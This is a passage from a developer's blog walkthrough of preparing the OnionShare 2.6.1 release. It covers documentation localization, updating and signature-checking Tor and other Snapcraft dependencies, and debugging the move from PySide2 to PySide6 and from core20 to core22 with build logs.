<span class="p">(</span><span class="s2">"Українська"</span><span class="p">,</span> <span class="s2">"uk"</span><span class="p">),</span> <span class="c1"># Ukrainian</span>
<span class="p">(</span><span class="s2">"Tiếng Việt"</span><span class="p">,</span> <span class="s2">"vi"</span><span class="p">),</span> <span class="c1"># Vietnamese</span>
<span class="p">]</span>
</pre></div>
<p>Unfortunately, in this release I'm commenting out documentation translations for Japanese, Khmer, and Swedish, since they didn't make the 90% threshold.</p>
<p>Next, I also need to edit <code>docs/build.sh</code> and update the <code>LOCALES</code> variable to include language codes for this same list of enabled languages. In this case it's:</p>
<div class="hll"><pre><span></span><span class="nv">LOCALES</span><span class="o">=</span><span class="s2">"en fr el pl es tr uk vi"</span>
</pre></div>
<p>Finally, I build the new documentation by running this from the <code>docs</code> folder:</p>
<div class="hll"><pre><span></span>poetry<span class="w"> </span>run<span class="w"> </span>./build.sh
</pre></div>
<p>This builds the static documentation website (hosted at <a href="https://docs.onionshare.org/">https://docs.onionshare.org/</a>) for version 2.6.1, and stored it in <code>docs/build/docs/2.6.1/</code>. Here's a screenshot of the the documentation, viewed locally:</p>
<p><img src="onionshare-docs-english.png" alt="Documentation in English"></p>
<p>In that screenshot I had clicked the menu button in the bottom left, which shows which languages the documentation is translated into, and lets you switch. Here's a screenshot of the same documentation page, but this time in Vietnamese:</p>
<p><img src="onionshare-docs-vietnamese.png" alt="Documentation in English"></p>
<p>I've committed all of these changes, and with that, localization for 2.6.1 is finished!</p>
<h2 id="making-sure-snapcraft-packaging-works">Making sure Snapcraft packaging works</h2><p>To make sure the Snapcraft package works, I need to switch to my computer running Ubuntu--in my case, I'm running Ubuntu 23.04.</p>
<p>To make the Snapcraft release, I need to update all of the dependencies in the Snapcraft <a href="https://github.com/onionshare/onionshare/blob/main/snap/snapcraft.yaml">YAML file</a>, <code>snap/snapcraft.yaml</code>, and then build and install a snap, to make sure it all works as expected.</p>
<h3 id="updating-dependencies">Updating dependencies</h3><p>I'll start by updating the versions of <code>tor</code>, <code>libevent</code>, <code>obfs4</code>, <code>snowflake-client</code>, and <code>meek-client</code>.</p>
<p>Here's the existing <code>tor</code> part:</p>
<div class="hll"><pre><span></span><span class="nt">tor</span><span class="p">:</span>
<span class="w"> </span><span class="nt">source</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">https://dist.torproject.org/tor-0.4.7.12.tar.gz</span>
<span class="w"> </span><span class="nt">source-checksum</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">sha256/3b5d969712c467851bd028f314343ef15a97ea457191e93ffa97310b05b9e395</span>
<span class="w"> </span><span class="nt">source-type</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">tar</span>
<span class="w"> </span><span class="nt">plugin</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">autotools</span>
<span class="w"> </span><span class="nt">autotools-configure-parameters</span><span class="p">:</span>
<span class="w"> </span><span class="p p-Indicator">-</span><span class="w"> </span><span class="s">"--with-libevent-dir=$SNAPCRAFT_PART_INSTALL/../../libevent/install/usr/local"</span>
<span class="w"> </span><span class="nt">build-packages</span><span class="p">:</span>
<span class="w"> </span><span class="p p-Indicator">-</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">libssl-dev</span>
<span class="w"> </span><span class="p p-Indicator">-</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">zlib1g-dev</span>
<span class="w"> </span><span class="nt">after</span><span class="p">:</span><span class="w"> </span><span class="p p-Indicator">[</span><span class="nv">libevent</span><span class="p p-Indicator">]</span>
</pre></div>
<p>I want to upgrade to the latest version of Tor, so I'm going to <a href="https://dist.torproject.org/">https://dist.torproject.org/</a> to check to see what that is. At the moment, it looks like the latest release is <code>tor-0.4.8.5.tar.gz</code>. So on my computer, I'll download this file, along with it's checksum, and its PGP signature:</p>
<div class="hll"><pre><span></span>wget<span class="w"> </span>https://dist.torproject.org/tor-0.4.8.5.tar.gz
wget<span class="w"> </span>https://dist.torproject.org/tor-0.4.8.5.tar.gz.sha256sum
wget<span class="w"> </span>https://dist.torproject.org/tor-0.4.8.5.tar.gz.sha256sum.asc
</pre></div>
<p>I'm then verifying the checksum's signature:</p>
<pre><code>$ gpg --verify tor-0.4.8.5.tar.gz.sha256sum.asc
gpg: assuming signed data in 'tor-0.4.8.5.tar.gz.sha256sum'
gpg: Signature made Wed 30 Aug 2023 06:14:29 AM PDT
gpg: using RSA key B74417EDDF22AC9F9E90F49142E86A2A11F48D36
gpg: Good signature from "David Goulet <dgoulet@ev0ke.net>" [unknown]
gpg: aka "David Goulet <dgoulet@riseup.net>" [unknown]
gpg: aka "David Goulet <dgoulet@torproject.org>" [unknown]
gpg: WARNING: This key is not certified with a trusted signature!
gpg: There is no indication that the signature belongs to the owner.
Primary key fingerprint: B744 17ED DF22 AC9F 9E90 F491 42E8 6A2A 11F4 8D36
gpg: Signature made Wed 30 Aug 2023 07:14:27 AM PDT
gpg: using EDDSA key 514102454D0A87DB0767A1EBBE6A0531C18A9179
gpg: Good signature from "Alexander Færøy <ahf@0x90.dk>" [unknown]
gpg: aka "Alexander Færøy <ahf@bornhack.org>" [unknown]
gpg: aka "Alexander Færøy <ahf@fsfe.org>" [unknown]
gpg: aka "Alexander Færøy <ahf@irc6.net>" [unknown]
gpg: aka "Alexander Færøy <ahf@irssi.org>" [unknown]
gpg: aka "Alexander Færøy <ahf@torproject.org>" [unknown]
gpg: WARNING: This key is not certified with a trusted signature!
gpg: There is no indication that the signature belongs to the owner.
Primary key fingerprint: 1C1B C007 A9F6 07AA 8152 C040 BEA7 B180 B149 1921
Subkey fingerprint: 5141 0245 4D0A 87DB 0767 A1EB BE6A 0531 C18A 9179
</code></pre>
<p>Then I'm making sure the SHA256 checksum matches:</p>
<pre><code>$ sha256sum --check tor-0.4.8.5.tar.gz.sha256sum
tor-0.4.8.5.tar.gz: OK
</code></pre>
<p>It does, so now I'm updating <code>snapcraft.yaml</code> to include the new version of Tor, along with its checksum:</p>
<div class="hll"><pre><span></span><span class="nt">tor</span><span class="p">:</span>
<span class="w"> </span><span class="nt">source</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">https://dist.torproject.org/tor-0.4.8.5.tar.gz</span>
<span class="w"> </span><span class="nt">source-checksum</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">sha256/6957cfd14a29eee7555c52f8387a46f2ce2f5fe7dadf93547f1bc74b1657e119</span>
</pre></div>
<p>Next, I'll do something similar for <code>libevent</code>. Here's the <code>libevent</code> part:</p>
<div class="hll"><pre><span></span><span class="nt">libevent</span><span class="p">:</span>
<span class="w"> </span><span class="nt">source</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">https://github.com/libevent/libevent/releases/download/release-2.1.12-stable/libevent-2.1.12-stable.tar.gz</span>
<span class="w"> </span><span class="nt">source-checksum</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">sha256/92e6de1be9ec176428fd2367677e61ceffc2ee1cb119035037a27d346b0403bb</span>
<span class="w"> </span><span class="nt">source-type</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">tar</span>
<span class="w"> </span><span class="nt">plugin</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">autotools</span>
</pre></div>
<p>Looking at <a href="https://github.com/libevent/libevent/releases/">https://github.com/libevent/libevent/releases/</a> it seems that 2.1.12-stable is still the latest stable version, so I'll leave this part as is.</p>
<p>Next, I'll upgrade <code>obfs4</code>, <code>snowflake-client</code>, and <code>meek-client</code>. These ones are slightly simpler because they're pulled from git, and I just need to update the git tags--the same tags I used in the <code>desktop/scripts/build-pt-*</code> scripts. I'm leaving <code>obfs4</code> with the source tag <code>obfs4proxy-0.0.14</code>, I'm upgrading <code>snowflake-client</code> to use the source tag <code>v2.6.0</code>, and I'm upgrading <code>meek-client</code> to use the source tag <code>v0.38.0</code>.</p>
<p>I then turn my attention to the <code>onionshare</code> part. While the CLI and desktop version of OnionShare use Poetry to keep track of Python dependencies, I had issues making this work with Snapcraft, so instead I redefine those dependencies in a <code>requirements.txt</code> files. Without going into the nitty gritty details, I basically need to look at all of the dependencies in <code>cli/pyproject.toml</code> and <code>desktop/pyproject.toml</code> and make sure the <code>requirements.txt</code> file in the <code>override-pull</code> section of the <code>onionshare</code> part matches them. Here's my new <code>override-pull</code> section:</p>
<div class="hll"><pre><span></span><span class="nt">override-pull</span><span class="p">:</span><span class="w"> </span><span class="p p-Indicator">|</span>
<span class="w"> </span><span class="no">snapcraftctl pull</span>
<span class="w"> </span><span class="no">rm pyproject.toml poetry.lock</span>
<span class="w"> </span><span class="no">cat > requirements.txt << EOF</span>
<span class="w"> </span><span class="no"># onionshare_cli</span>
<span class="w"> </span><span class="no">click</span>
<span class="w"> </span><span class="no">flask==2.3.2</span>
<span class="w"> </span><span class="no">flask-compress==1.13</span>
<span class="w"> </span><span class="no">flask-socketio==5.3.4</span>
<span class="w"> </span><span class="no">psutil</span>
<span class="w"> </span><span class="no">pysocks</span>
<span class="w"> </span><span class="no">requests[socks]</span>
<span class="w"> </span><span class="no">unidecode</span>
<span class="w"> </span><span class="no">urllib3</span>
<span class="w"> </span><span class="no">eventlet</span>
<span class="w"> </span><span class="no">setuptools</span>
<span class="w"> </span><span class="no">pynacl</span>
<span class="w"> </span><span class="no">colorama</span>
<span class="w"> </span><span class="no">gevent-websocket</span>
<span class="w"> </span><span class="no">stem==1.8.1</span>
<span class="w"> </span><span class="no">waitress</span>
<span class="w"> </span><span class="no">werkzeug==2.3.4</span>
<span class="w"> </span><span class="no"># onionshare</span>
<span class="w"> </span><span class="no">qrcode</span>
<span class="w"> </span><span class="no">EOF</span>
</pre></div>
<h3 id="trying-to-update-from-pyside2-to-pyside6">Trying to update from PySide2 to PySide6</h3><p>One of the major changes between OnionShare 2.6 and 2.6.1 is that we've upgraded <a href="https://wiki.qt.io/Qt_for_Python">Qt for Python</a> (the GUI framework that OnionShare uses) from PySide2 to PySide6. PySide2 brings Qt 5.x support to Python, and PySide6 brings Qt 6.x support. The main reason for upgrading is because we wanted to support Apple Silicon Macs: PySide2 does not publish arm64 binaries, which PySide6 does.</p>
<p>In the <code>stage-packages</code> section of the <code>onionshare</code> part, the YAML file lists Ubuntu packages that are required for the app to run, including:</p>
<ul>
<li><code>python3-pyside2.qtcore</code></li>
<li><code>python3-pyside2.qtgui</code></li>
<li><code>python3-pyside2.qtwidgets</code></li>
</ul>
<p>Can I just change these <code>pyside2</code>s to <code>pyside6</code>s? Nope. I searched <a href="https://packages.ubuntu.com/">Ubuntu packages</a> and it looks like the equivalent PySide6 packages aren't available. Okay, I will delete these <code>python3-pyside2.*</code> packages from <code>stage-packages</code>, and add <code>PySide6==6.5.2</code> to the <code>requirements.txt</code> file in the <code>override-pull</code> section, to see if that works.</p>
<p>In order to test, I need to build the snap locally. To do that, first I need to install <code>snapcraft</code> (the tool for building snaps, as opposed to <code>snap</code>, which is the tool for installing already-built snaps) on my computer:</p>
<div class="hll"><pre><span></span>sudo<span class="w"> </span>snap<span class="w"> </span>install<span class="w"> </span>snapcraft<span class="w"> </span>--classic
</pre></div>
<p>Then I can build it by running:</p>
<div class="hll"><pre><span></span>snapcraft
</pre></div>
<p>This takes a long time to run. It launches a new VM, downloads the source code for all of the OnionShare dependencies, compiles them all, and builds OnionShare itself. It's quicker on subsequent runs too. Eventually, it finishes with:</p>
<pre><code>--snip--
Priming onionshare
+ snapcraftctl prime
This part is missing libraries that cannot be satisfied with any available stage-packages known to snapcraft:
- libQt6Quick3DHelpersImpl.so.6
- libQt6Quick3DSpatialAudio.so.6
- libmysqlclient.so.21
- libxcb-cursor.so.0
- libxkbfile.so.1
These dependencies can be satisfied via additional parts or content sharing. Consider validating configured filesets if this dependency was built.
Snapping |
Snapped onionshare_2.6.1_amd64.snap
</code></pre>
<p>Hmm, there's a warning that it's missing Qt6 libraries. That's probably not good.</p>
<p><em>🎵 Debugging noises... 🎵</em></p>
<p>The <code>base</code> of this snap is <code>core20</code>, which is based on Ubuntu 20.04 LTS. I searched Ubuntu 20.04 packages for "libqt6" and there no results, but there are some "libqt6" packages in Ubuntu 22.04. If I can't get this to work, I might need to upgrade the snap from <code>core20</code> to <code>core22</code>, which could come with its own set of problems. Alternatively, I could try compiling Qt6 inside the snap to get the libraries, instead of installing them from the package manager.</p>
<p>Still, I'll install the snap I created and then run it to see what happens.</p>
<pre><code>$ sudo snap install ./onionshare_2.6.1_amd64.snap --devmode
onionshare 2.6.1 installed
$ /snap/bin/onionshare
Warning: Schema “org.gnome.system.locale” has path “/system/locale/”. Paths starting with “/apps/”, “/desktop/” or “/system/” are deprecated.
Warning: Schema “org.gnome.system.proxy” has path “/system/proxy/”. Paths starting with “/apps/”, “/desktop/” or “/system/” are deprecated.
Warning: Schema “org.gnome.system.proxy.http” has path “/system/proxy/http/”. Paths starting with “/apps/”, “/desktop/” or “/system/” are deprecated.
Warning: Schema “org.gnome.system.proxy.https” has path “/system/proxy/https/”. Paths starting with “/apps/”, “/desktop/” or “/system/” are deprecated.
Warning: Schema “org.gnome.system.proxy.ftp” has path “/system/proxy/ftp/”. Paths starting with “/apps/”, “/desktop/” or “/system/” are deprecated.
Warning: Schema “org.gnome.system.proxy.socks” has path “/system/proxy/socks/”. Paths starting with “/apps/”, “/desktop/” or “/system/” are deprecated.
Traceback (most recent call last):
File "/snap/onionshare/x3/bin/onionshare", line 5, in <module>
from onionshare import main
File "/snap/onionshare/x3/lib/python3.8/site-packages/onionshare/__init__.py", line 34, in <module>
from onionshare_cli.common import Common
File "/snap/onionshare/x3/lib/python3.8/site-packages/onionshare_cli/__init__.py", line 30, in <module>
from .web import Web
File "/snap/onionshare/x3/lib/python3.8/site-packages/onionshare_cli/web/__init__.py", line 21, in <module>
from .web import Web
File "/snap/onionshare/x3/lib/python3.8/site-packages/onionshare_cli/web/web.py", line 26, in <module>
from packaging.version import Version
ModuleNotFoundError: No module named 'packaging'
</code></pre>
<p>Okay, I'll add <code>packaging</code> to the <code>requirements.txt</code> and try again:</p>
<div class="hll"><pre><span></span>snapcraft<span class="w"> </span><span class="c1"># this takes awhile to finish</span>
sudo<span class="w"> </span>snap<span class="w"> </span>install<span class="w"> </span>./onionshare_2.6.1_amd64.snap<span class="w"> </span>--devmode
/snap/bin/onionshare
</pre></div>
<p>This time it fails with the error:</p>
<pre><code>python3: symbol lookup error: /snap/onionshare/x4/lib/python3.8/site-packages/PySide6/Qt/plugins/platforms/../../lib/libQt6WaylandClient.so.6: undefined symbol: wl_proxy_marshal_flags
</code></pre>
<p>Okay yeah, I expected that it wouldn't work. I'm going to need to get Qt6 installed in this snap.</p>
<h3 id="updating-from-core20-to-core22">Updating from <code>core20</code> to <code>core22</code></h3><p><em>🎵 Debugging noises continue... 🎵</em></p>
<p>In order to install the Qt6 libraries from Ubuntu packages, I'm going to upgrade this snap to use <code>core22</code>, since Ubuntu 22.04 has Qt6 packages with names like <code>libqt6core6</code> and <code>libqt6gui6</code>.</p>
<p>While I'm performing this upgrade, I'll be following this <a href="https://forum.snapcraft.io/t/micro-howto-migrate-from-core20-to-core22/30188">official guide</a> on migrating from <code>core20</code> to <code>core22</code>. Here's what I'm changing:</p>
<ul>
<li>I'm changing <code>base: core20</code> to <code>base: core22</code>.</li>
<li>In all of the parts with an <code>override-pull</code> section, I'm replacing <code>snapcraftctl pull</code> with <code>craftctl default</code>.</li>
<li>In my <code>override-build</code> sections, I'm changing the environment variable <code>$SNAPCRAFT_PART_INSTALL</code> to <code>$CRAFT_PART_INSTALL</code>.</li>
<li>The <code>onionshare</code> app uses the <code>gnome-3-38</code> extension, but I'm removing it altogether--if it's required, I can try the <code>gnome</code> extension (which supports <code>core22</code>) or the <code>kde-neon</code> extension</li>
</ul>
<p>After making these changes, I'm trying again:</p>
<pre><code>$ snapcraft
Traceback (most recent call last):
File "/snap/snapcraft/9542/bin/snapcraft", line 8, in <module>
sys.exit(run())
File "/snap/snapcraft/9542/lib/python3.8/site-packages/snapcraft/cli.py", line 255, in run
_run_dispatcher(dispatcher, global_args)
File "/snap/snapcraft/9542/lib/python3.8/site-packages/snapcraft/cli.py", line 228, in _run_dispatcher
dispatcher.run()
File "/snap/snapcraft/9542/lib/python3.8/site-packages/craft_cli/dispatcher.py", line 448, in run
return self._loaded_command.run(self._parsed_command_args)
File "/snap/snapcraft/9542/lib/python3.8/site-packages/snapcraft/commands/lifecycle.py", line 265, in run
super().run(parsed_args)
File "/snap/snapcraft/9542/lib/python3.8/site-packages/snapcraft/commands/lifecycle.py", line 138, in run
parts_lifecycle.run(self.name, parsed_args)
File "/snap/snapcraft/9542/lib/python3.8/site-packages/snapcraft/parts/lifecycle.py", line 216, in run
_run_command(
File "/snap/snapcraft/9542/lib/python3.8/site-packages/snapcraft/parts/lifecycle.py", line 262, in _run_command
_run_in_provider(project, command_name, parsed_args)
File "/snap/snapcraft/9542/lib/python3.8/site-packages/snapcraft/parts/lifecycle.py", line 487, in _run_in_provider
providers.ensure_provider_is_available(provider)
File "/snap/snapcraft/9542/lib/python3.8/site-packages/snapcraft/providers.py", line 148, in ensure_provider_is_available
LXDProvider.ensure_provider_is_available()
File "/snap/snapcraft/9542/lib/python3.8/site-packages/craft_providers/lxd/lxd_provider.py", line 70, in ensure_provider_is_available
ensure_lxd_is_ready()
File "/snap/snapcraft/9542/lib/python3.8/site-packages/craft_providers/lxd/installer.py", line 132, in ensure_lxd_is_ready
raise errors.LXDError(
craft_providers.lxd.errors.LXDError: LXD requires additional permissions.
Ensure that the user is in the 'lxd' group.
Visit https://linuxcontainers.org/lxd/getting-started-cli/ for instructions on installing and configuring LXD for your operating system.
</code></pre>
<p>It turns out, Snapcraft is moving away from VMs to build snaps and towards Linux containers (which honestly is way nicer--this makes it simpler to build snaps inside of VMs, without needing nested VMs). I ran into this a little while I was getting snaps to build in GitHub Actions. Based on this error message, it looks like I need to add my user on my Ubuntu system to the <code>lxd</code> group. I do that by running this:</p>
<div class="hll"><pre><span></span>sudo<span class="w"> </span>usermod<span class="w"> </span>-a<span class="w"> </span>-G<span class="w"> </span>lxd<span class="w"> </span><span class="nv">$USER</span>
</pre></div>
<p>Next, I'm saving all my work and rebooting my Ubuntu computer. After booting back in, I tried again, and realized I had to run this command before it will work:</p>
<div class="hll"><pre><span></span>lxd<span class="w"> </span>init<span class="w"> </span>--auto
</pre></div>
<p>After that, running <code>snapcraft</code> is finally building the OnionShare snap, this time in a container instead of in a VM. Here's the output:</p>
<pre><code>$ snapcraft
Launching instance...
Executed: pull launcher
Executed: pull libevent
Executed: pull meek-client
Executed: pull obfs4
Executed: pull snowflake-client
Executed: pull tor
Executed: pull onionshare-cli
Executed: pull onionshare
Executed: build launcher
Executed: build libevent
Executed: build meek-client
Executed: build obfs4
Executed: build snowflake-client
Executed: skip pull libevent (already ran)
Executed: skip build libevent (already ran)
Executed: stage libevent (required to build 'tor')
Executed: build tor
Executed: skip pull meek-client (already ran)
Executed: skip build meek-client (already ran)
Executed: stage meek-client (required to build 'onionshare-cli')
Executed: skip pull obfs4 (already ran)
Executed: skip build obfs4 (already ran)
Executed: stage obfs4 (required to build 'onionshare-cli')
Executed: skip pull tor (already ran)
Executed: skip build tor (already ran)
Executed: stage tor (required to build 'onionshare-cli')
Executed: skip pull snowflake-client (already ran)
Executed: skip build snowflake-client (already ran)
Executed: stage snowflake-client (required to build 'onionshare-cli')
Executed: build onionshare-cli
Executed: skip pull onionshare-cli (already ran)
Executed: skip build onionshare-cli (already ran)
Executed: stage onionshare-cli (required to build 'onionshare')
Executed: build onionshare
Executed: stage launcher
Executed: skip stage libevent (already ran)
Executed: skip stage meek-client (already ran)
Executed: skip stage obfs4 (already ran)
Executed: skip stage snowflake-client (already ran)
Executed: skip stage tor (already ran)
Executed: skip stage onionshare-cli (already ran)
Executed: stage onionshare
Executed: prime launcher
Executed: prime libevent
Executed: prime meek-client
Executed: prime obfs4
Executed: prime snowflake-client
Executed: prime tor
Executed: prime onionshare-cli
Executed: prime onionshare
Executed parts lifecycle
Generated snap metadata
Unable to determine library dependencies for 'lib/python3.10/site-packages/PySide6/QtMultimedia.abi3.so'
Unable to determine library dependencies for 'lib/python3.10/site-packages/PySide6/QtMultimediaWidgets.abi3.so'
Unable to determine library dependencies for 'lib/python3.10/site-packages/PySide6/QtQml.abi3.so'
Unable to determine library dependencies for 'lib/python3.10/site-packages/PySide6/QtQuick.abi3.so'
Unable to determine library dependencies for 'lib/python3.10/site-packages/PySide6/QtSpatialAudio.abi3.so'
Unable to determine library dependencies for 'lib/python3.10/site-packages/PySide6/QtTextToSpeech.abi3.so'
Unable to determine library dependencies for 'lib/python3.10/site-packages/PySide6/QtWebEngineCore.abi3.so'
Unable to determine library dependencies for 'lib/python3.10/site-packages/PySide6/QtWebEngineQuick.abi3.so'
Unable to determine library dependencies for 'lib/python3.10/site-packages/PySide6/QtWebEngineWidgets.abi3.so'
Lint warnings:
- library: lib/python3.10/site-packages/PySide6/Qt/lib/libQt6WebEngineCore.so.6: missing dependency 'libxkbfile.so.1'. (https://snapcraft.io/docs/linters-library)
- library: lib/python3.10/site-packages/PySide6/Qt/lib/libQt6WebEngineQuick.so.6: missing dependency 'libxkbfile.so.1'. (https://snapcraft.io/docs/linters-library)
- library: lib/python3.10/site-packages/PySide6/Qt/lib/libQt6WebEngineWidgets.so.6: missing dependency 'libxkbfile.so.1'. (https://snapcraft.io/docs/linters-library)
- library: lib/python3.10/site-packages/PySide6/Qt/lib/libQt6XcbQpa.so.6: missing dependency 'libxcb-cursor.so.0'. (https://snapcraft.io/docs/linters-library)
- library: lib/python3.10/site-packages/PySide6/Qt/libexec/QtWebEngineProcess: missing dependency 'libxkbfile.so.1'. (https://snapcraft.io/docs/linters-library)
- library: lib/python3.10/site-packages/PySide6/Qt/plugins/designer/libqwebengineview.so: missing dependency 'libxkbfile.so.1'. (https://snapcraft.io/docs/linters-library)
- library: lib/python3.10/site-packages/PySide6/Qt/plugins/multimedia/libgstreamermediaplugin.so: missing dependency 'libgstallocators-1.0.so.0'. (https://snapcraft.io/docs/linters-library)
- library: lib/python3.10/site-packages/PySide6/Qt/plugins/multimedia/libgstreamermediaplugin.so: missing dependency 'libgstapp-1.0.so.0'. (https://snapcraft.io/docs/linters-library)
- library: lib/python3.10/site-packages/PySide6/Qt/plugins/multimedia/libgstreamermediaplugin.so: missing dependency 'libgstaudio-1.0.so.0'. (https://snapcraft.io/docs/linters-library)
- library: lib/python3.10/site-packages/PySide6/Qt/plugins/multimedia/libgstreamermediaplugin.so: missing dependency 'libgstbase-1.0.so.0'. (https://snapcraft.io/docs/linters-library)
- library: lib/python3.10/site-packages/PySide6/Qt/plugins/multimedia/libgstreamermediaplugin.so: missing dependency 'libgstgl-1.0.so.0'. (https://snapcraft.io/docs/linters-library)
- library: lib/python3.10/site-packages/PySide6/Qt/plugins/multimedia/libgstreamermediaplugin.so: missing dependency 'libgstpbutils-1.0.so.0'. (https://snapcraft.io/docs/linters-library)
- library: lib/python3.10/site-packages/PySide6/Qt/plugins/multimedia/libgstreamermediaplugin.so: missing dependency 'libgstreamer-1.0.so.0'. (https://snapcraft.io/docs/linters-library)
- library: lib/python3.10/site-packages/PySide6/Qt/plugins/multimedia/libgstreamermediaplugin.so: missing dependency 'libgstvideo-1.0.so.0'. (https://snapcraft.io/docs/linters-library)
- library: lib/python3.10/site-packages/PySide6/Qt/plugins/platforms/libqxcb.so: missing dependency 'libxcb-cursor.so.0'. (https://snapcraft.io/docs/linters-library)
- library: lib/python3.10/site-packages/PySide6/Qt/plugins/sqldrivers/libqsqlmysql.so: missing dependency 'libmysqlclient.so.21'. (https://snapcraft.io/docs/linters-library)
- library: lib/python3.10/site-packages/PySide6/Qt/plugins/xcbglintegrations/libqxcb-egl-integration.so: missing dependency 'libxcb-cursor.so.0'. (https://snapcraft.io/docs/linters-library)
- library: lib/python3.10/site-packages/PySide6/Qt/plugins/xcbglintegrations/libqxcb-glx-integration.so: missing dependency 'libxcb-cursor.so.0'. (https://snapcraft.io/docs/linters-library)
- library: lib/python3.10/site-packages/PySide6/Qt/qml/QtQuick3D/Helpers/impl/libqtquick3dhelpersimplplugin.so: missing dependency 'libQt6Quick3DHelpersImpl.so.6'. (https://snapcraft.io/docs/linters-library)
- library: lib/python3.10/site-packages/PySide6/Qt/qml/QtQuick3D/SpatialAudio/libquick3dspatialaudioplugin.so: missing dependency 'libQt6Quick3DSpatialAudio.so.6'. (https://snapcraft.io/docs/linters-library)
- library: lib/python3.10/site-packages/PySide6/Qt/qml/QtWebEngine/libqtwebenginequickplugin.so: missing dependency 'libxkbfile.so.1'. (https://snapcraft.io/docs/linters-library)
- library: libQt6MultimediaWidgets.so.6: unused library 'lib/python3.10/site-packages/PySide6/Qt/lib/libQt6MultimediaWidgets.so.6'. (https://snapcraft.io/docs/linters-library)
- library: libQt6Quick3DGlslParser.so.6: unused library 'lib/python3.10/site-packages/PySide6/Qt/lib/libQt6Quick3DGlslParser.so.6'. (https://snapcraft.io/docs/linters-library)
- library: libQt6Quick3DIblBaker.so.6: unused library 'lib/python3.10/site-packages/PySide6/Qt/lib/libQt6Quick3DIblBaker.so.6'. (https://snapcraft.io/docs/linters-library)
- library: libEGL_mesa.so.0: unused library 'usr/lib/x86_64-linux-gnu/libEGL_mesa.so.0.0.0'. (https://snapcraft.io/docs/linters-library)
- library: libGLX_mesa.so.0: unused library 'usr/lib/x86_64-linux-gnu/libGLX_mesa.so.0.0.0'. (https://snapcraft.io/docs/linters-library)
- library: libcolordprivate.so.2: unused library 'usr/lib/x86_64-linux-gnu/libcolordprivate.so.2.0.5'. (https://snapcraft.io/docs/linters-library)
- library: libdconf.so.1: unused library 'usr/lib/x86_64-linux-gnu/libdconf.so.1.0.0'. (https://snapcraft.io/docs/linters-library)
- library: libexslt.so.0: unused library 'usr/lib/x86_64-linux-gnu/libexslt.so.0.8.20'. (https://snapcraft.io/docs/linters-library)
- library: libgdk_pixbuf_xlib-2.0.so.0: unused library 'usr/lib/x86_64-linux-gnu/libgdk_pixbuf_xlib-2.0.so.0.4000.2'. (https://snapcraft.io/docs/linters-library)
- library: libicuio.so.70: unused library 'usr/lib/x86_64-linux-gnu/libicuio.so.70.1'. (https://snapcraft.io/docs/linters-library)
- library: libicutest.so.70: unused library 'usr/lib/x86_64-linux-gnu/libicutest.so.70.1'. (https://snapcraft.io/docs/linters-library)
- library: libodbccr.so.2: unused library 'usr/lib/x86_64-linux-gnu/libodbccr.so.2.0.0'. (https://snapcraft.io/docs/linters-library)
- library: libpulse-mainloop-glib.so.0: unused library 'usr/lib/x86_64-linux-gnu/libpulse-mainloop-glib.so.0.0.6'. (https://snapcraft.io/docs/linters-library)
- library: libpulse-simple.so.0: unused library 'usr/lib/x86_64-linux-gnu/libpulse-simple.so.0.1.1'. (https://snapcraft.io/docs/linters-library)
- library: librsvg-2.so.2: unused library 'usr/lib/x86_64-linux-gnu/librsvg-2.so.2.48.0'. (https://snapcraft.io/docs/linters-library)
- library: libssl3.so: unused library 'usr/lib/x86_64-linux-gnu/libssl3.so'. (https://snapcraft.io/docs/linters-library)
- library: libevent_core-2.1.so.7: unused library 'usr/local/lib/libevent_core-2.1.so.7.0.1'. (https://snapcraft.io/docs/linters-library)
- library: libevent_extra-2.1.so.7: unused library 'usr/local/lib/libevent_extra-2.1.so.7.0.1'. (https://snapcraft.io/docs/linters-library)
- library: libevent_openssl-2.1.so.7: unused library 'usr/local/lib/libevent_openssl-2.1.so.7.0.1'. (https://snapcraft.io/docs/linters-library)
- library: libevent_pthreads-2.1.so.7: unused library 'usr/local/lib/libevent_pthreads-2.1.so.7.0.1'. (https://snapcraft.io/docs/linters-library)
Created snap package onionshare_2.6.1_amd64.snap
</code></pre>
<p>I installed this snap and tried running it, and this time it crashed with the error:</p>
<pre><code>Failed to create wl_display (No such file or directory)
qt.qpa.plugin: Could not load the Qt platform plugin "wayland" in "" even though it was found.
qt.qpa.plugin: Could not load the Qt platform plugin "xcb" in "" even though it was found.
This application failed to start because no Qt platform plugin could be initialized. Reinstalling the application may fix this problem.
Available platform plugins are: eglfs, linuxfb, minimal, minimalegl, offscreen, vkkhrdisplay, vnc, wayland-egl, wayland, xcb.
Aborted (core dumped)
</code></pre>
<p>It looks like I need to install some more dependencies for this to work. The lint warnings give some useful hints as to what they might be. Look at this line:</p>
<pre><code>- library: lib/python3.10/site-packages/PySide6/Qt/lib/libQt6WebEngineCore.so.6: missing dependency 'libxkbfile.so.1'. (https://snapcraft.io/docs/linters-library)
</code></pre>
<p>Qt6 is missing the dependency <code>libxkbfile.so.1</code>. In Ubuntu you can search for what package contains that file like this:</p>
<pre><code>$ apt-file search libxkbfile.so.1
libxkbfile1: /usr/lib/x86_64-linux-gnu/libxkbfile.so.1
libxkbfile1: /usr/lib/x86_64-linux-gnu/libxkbfile.so.1.0.2
</code></pre>
<p>This means that if I install the package <code>libxkbfile1</code>, it should come with the library I need. Do the same for all of the lint warnings saying I was missing a dependency, I found that I needed to add the following packages to <code>stage-packages</code>:</p>
<ul>
<li><code>libgstreamer1.0-0</code></li>
<li><code>libgstreamer1.0-dev</code></li>
<li><code>libgstreamer-gl1.0-0</code></li>
<li><code>libgstreamer-plugins-base1.0-0</code></li>
<li><code>libmysqlclient21</code></li>
<li><code>libxcb-cursor0</code></li>
<li><code>libxkbfile1</code></li>
<li><code>qml6-module-qtquick3d-spatialaudio</code></li>
</ul>
<p>I tried to build another snap:</p>
<pre><code>$ snapcraft
Launching instance...
Executed: skip pull launcher (already ran)
